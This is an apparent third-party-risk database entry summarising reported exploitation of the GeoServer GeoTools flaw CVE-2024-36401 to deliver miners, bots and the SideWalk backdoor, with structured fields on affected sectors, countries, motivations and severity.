Multiple threat actors exploited a GeoServer GeoTools flaw (CVE-2024-36401), leading to malware campaigns delivering cryptocurrency miners, bots, and the SideWalk backdoor. Targeted entities include IT service providers in India, US technology firms, Belgian government bodies, and telecom companies in Thailand and Brazil. Exploits allowed persistent remote access, data exfiltration, and payload deployment, potentially causing widespread disruption across targeted regions and industries. Open-source flexibility requires strict security measures, including timely updates and threat detection strategies to mitigate risks posed by such vulnerabilities.
Source: https://securityaffairs.com/168197/malware/geoserver-geotools-flaw-cve-2024-36401-malware.html
TPRM report: https://scoringcyber.rankiteo.com/company/geosolutionsgroup
"id": "geo001091424",
"linkid": "geosolutionsgroup",
"type": "Vulnerability",
"date": "9/2024",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization’s existence"
{'affected_entities': [{'industry': 'Technology',
'location': 'India',
'type': 'IT Service Provider'},
{'industry': 'Technology',
'location': 'United States',
'type': 'Technology Firm'},
{'industry': 'Government',
'location': 'Belgium',
'type': 'Government Body'},
{'industry': 'Telecommunications',
'location': ['Thailand', 'Brazil'],
'type': 'Telecom Company'}],
'attack_vector': 'Remote Access',
'data_breach': {'data_exfiltration': True},
'description': 'Multiple threat actors exploited a GeoServer GeoTools flaw '
'(CVE-2024-36401), leading to malware campaigns delivering '
'cryptocurrency miners, bots, and the SideWalk backdoor. '
'Targeted entities include IT service providers in India, US '
'technology firms, Belgian government bodies, and telecom '
'companies in Thailand and Brazil. Exploits allowed persistent '
'remote access, data exfiltration, and payload deployment, '
'potentially causing widespread disruption across targeted '
'regions and industries. Open-source flexibility requires '
'strict security measures, including timely updates and threat '
'detection strategies to mitigate risks posed by such '
'vulnerabilities.',
'impact': {'data_compromised': True,
'operational_impact': 'Widespread Disruption',
'systems_affected': True},
'initial_access_broker': {'backdoors_established': True,
'entry_point': 'GeoServer GeoTools Flaw'},
'lessons_learned': 'Open-source flexibility requires strict security '
'measures, including timely updates and threat detection '
'strategies to mitigate risks posed by such '
'vulnerabilities.',
'motivation': ['Cryptocurrency Mining',
'Botnet Expansion',
'Backdoor Installation'],
'post_incident_analysis': {'root_causes': 'Exploitation of CVE-2024-36401'},
'title': 'GeoServer GeoTools Flaw Exploitation',
'type': 'Exploitation of Vulnerability',
'vulnerability_exploited': 'CVE-2024-36401'}